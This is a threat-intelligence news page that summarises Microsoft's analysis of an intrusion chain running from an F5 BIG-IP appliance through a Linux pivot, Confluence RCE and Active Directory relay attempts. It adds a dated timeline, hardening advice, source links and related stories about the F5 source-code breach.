F5 BIG-IP Breach Led to Linux Pivot, Confluence RCE, and AD Relay Attempts
Microsoft reported a multi-stage intrusion that began with the compromise of an internet-facing F5 BIG-IP appliance and expanded into broader enterprise access. The attacker used the edge device to obtain SSH access to an internal Linux host, then carried out reconnaissance with tools including Nmap, gowitness, and other open-source utilities. Microsoft said the actor also downloaded a custom scanner, detected as HackTool:Linux/MalPack.B, from 206.189.27[.]39, and used the Linux foothold to identify an unpatched internal Atlassian Confluence server.
The attacker exploited Confluence for remote code execution, shifted payload staging to an FTP server on the initial Linux host after other delivery methods were blocked, and extracted credentials from Confluence configuration files. Those credentials were then used in attempts to move into Windows identity infrastructure through relay-style attacks against Active Directory, including Kerberos relay activity and exploitation of CVE-2025-33073, while the actor also tested SSL/TLS exposure with testssl. Microsoft said the case shows how end-of-life edge appliances, unpatched internal applications, and weak identity protections can combine into a single attack chain spanning network appliances, Linux systems, enterprise applications, and domain services.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
9 events from the most recent confirmed update back to the earliest known activity.
Microsoft publishes analysis and hardening recommendations
On May 22, 2026, Microsoft published its analysis of the multi-stage Linux intrusion and warned that end-of-life edge appliances, unpatched internal applications, and weak identity protections can combine into enterprise compromise. It recommended treating internet-facing edge devices as Tier-0 assets, urgently patching internal web applications such as Confluence, hardening against NTLM/Kerberos relay, and enabling Defender protections on Linux servers.
SSL/TLS weaknesses probed with testssl during later-stage activity
Microsoft observed the actor using testssl to probe SSL/TLS weaknesses as part of the intrusion. This indicates additional assessment of internal services while the compromise was underway.
Actor attempts AD relay attacks and exploits CVE-2025-33073
Using the stolen credentials, the threat actor attempted relay-style authentication attacks against Active Directory, including Kerberos relay activity and exploitation of CVE-2025-33073. The activity showed a shift from system compromise toward identity-focused domain attacks.
Credentials stolen from Confluence configuration files
Following access to Confluence, the actor extracted credentials from Confluence configuration files. Those credentials were then used to support further movement toward identity infrastructure.
Payloads staged through FTP after delivery attempts were blocked
Microsoft said the actor used an FTP server on the initially compromised Linux host to stage payload delivery after other delivery methods were blocked. This reflects an adaptation in tooling and delivery to maintain progress in the intrusion.
Unpatched internal Confluence server identified and exploited
The attacker discovered an unpatched internal Atlassian Confluence server and exploited it for remote code execution. This gave the actor another internal execution point and expanded the compromise.
Internal reconnaissance conducted from compromised Linux host
From the internal Linux host, the actor performed broad reconnaissance using tools including Nmap and gowitness to map systems and identify additional targets. Microsoft also observed the download of a custom scanner detected as HackTool:Linux/MalPack.B from 206.189.27[.]39.
Actor uses F5 foothold to access internal Linux host via SSH
After compromising the edge appliance, the actor leveraged it to obtain SSH access to an internal Linux system and pivot from the perimeter into the internal environment. This marked the transition from edge-device compromise to internal network access.
Threat actor compromises internet-facing F5 BIG-IP appliance
Microsoft reported that a threat actor initially gained access through an internet-facing F5 BIG-IP edge appliance, establishing the foothold that began the intrusion chain. The blog does not specify when the compromise occurred.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
Hackers Exploit F5 BIG-IP Appliance to Gain SSH Access and Pivot Into Enterprise Linux Networks
cybersecuritynews.com
Open sourceFrom edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence - Malware News - Malware Analysis, News and Indicators
malware.news
Open sourceFrom edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence | Microsoft Security Blog
microsoft.com
Open sourceCISA: Hackers abuse F5 BIG-IP cookies to map internal servers
bleepingcomputer.com
Open sourceHackers use F5 BIG-IP malware to stealthily steal data for years
bleepingcomputer.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
F5 Networks Breach Exposes BIG-IP Source Code and Vulnerability Data
F5 Networks confirmed that unidentified threat actors gained unauthorized access to its internal systems, resulting in the theft of files containing portions of BIG-IP source code and information about undisclosed vulnerabilities in the product. The breach was discovered on August 9, 2025, but evidence suggests that the attackers had maintained access to F5’s network for at least a year prior to detection. The attackers reportedly used a malware family known as BRICKSTORM, which has been attributed to a China-linked espionage group identified as UNC5221. This sophisticated intrusion highlights the ongoing targeting of edge infrastructure and security vendors by state-sponsored actors, who recognize the strategic value of such platforms in global networks. Following the breach, security researchers observed increased scanning activity targeting F5 BIG-IP devices on September 23, October 14, and October 15, 2025, although it remains unclear if these scans were directly related to the incident. Censys reported that over 680,000 F5 BIG-IP load balancers and application gateways are exposed on the public internet, with the largest concentrations in the United States, Germany, France, Japan, and China. Not all of these systems are necessarily vulnerable, but their public exposure increases the risk of exploitation. Security experts have emphasized the need for organizations to inventory, restrict access to, and proactively patch these devices to mitigate potential threats. The breach underscores the persistent risk posed by long-term, stealthy intrusions, particularly those orchestrated by nation-state actors. F5’s disclosure has prompted renewed calls for vigilance and improved security practices among organizations relying on edge devices. The incident also serves as a reminder that even companies specializing in security solutions are not immune to advanced persistent threats. Industry analysts have warned that the exposure of source code and vulnerability information could facilitate further attacks against F5 customers if not addressed promptly. Organizations using F5 products are advised to monitor for unusual activity, apply security updates, and review their network segmentation strategies. The breach has contributed to broader concerns about the security of network edge devices, which are increasingly targeted due to their critical role in enterprise infrastructure. F5’s response and ongoing investigation will be closely watched by the cybersecurity community as more details emerge about the scope and impact of the compromise.
Mar 21, 2026
Edge Appliance Compromises Expose Persistent Access Risks in Enterprise Networks
Investigations across multiple incidents have shown attackers gaining and maintaining access through internet-facing infrastructure, including **SonicWall SMA** devices, **Cisco AnyConnect** deployments, and **F5** systems. Truesec reported a persistent web shell on SonicWall SMA appliances, while separate reporting tied exploitation of `CVE-2020-3259` in Cisco AnyConnect to **Akira ransomware** activity. The UK **NCSC** also confirmed a compromise affecting the **F5** network, underscoring that trusted remote-access and application delivery platforms remain high-value targets for intrusion and follow-on operations. The broader pattern mirrors earlier high-impact compromises such as **SolarWinds**, where trusted enterprise technology became a pathway for stealthy access, and more recent financially motivated and state-linked campaigns, including Truesec reporting on a **North Korean threat actor** targeting the Nordic financial sector. Together, the cases show how compromise of edge devices and trusted network infrastructure can enable persistence, credential theft, lateral movement, and downstream attacks against enterprises and critical sectors.
May 25, 2026
F5 Breach Involving Advanced Brickstorm Malware and Supply Chain Risks
F5, a major application delivery and security provider, disclosed a significant breach in which malicious actors maintained persistent access to critical systems, including the BIG-IP product development environment and engineering knowledge management platform. The breach, which began in August and was deemed material by September, prompted F5 to delay public notification due to national security concerns. Upon disclosure, F5 released security patches for affected products, and CISA issued an emergency directive requiring federal agencies to patch vulnerable F5 devices immediately. The advanced 'Brickstorm' malware, attributed to Chinese threat actors, was detected as part of this breach, raising concerns about the potential for long-term exploitation of stolen technical specifications and code. While there is currently no evidence that the stolen information has been used to exploit F5 devices or alter the codebase, the incident highlights the ongoing risks associated with software supply chain attacks. The breach underscores the challenges organizations face in securing complex supply chains, as even widely adopted security frameworks may not fully mitigate such threats. The F5 incident draws parallels to previous high-profile supply chain compromises, emphasizing the need for more robust and comprehensive security measures to protect critical infrastructure and sensitive data from sophisticated nation-state actors.
Mar 21, 2026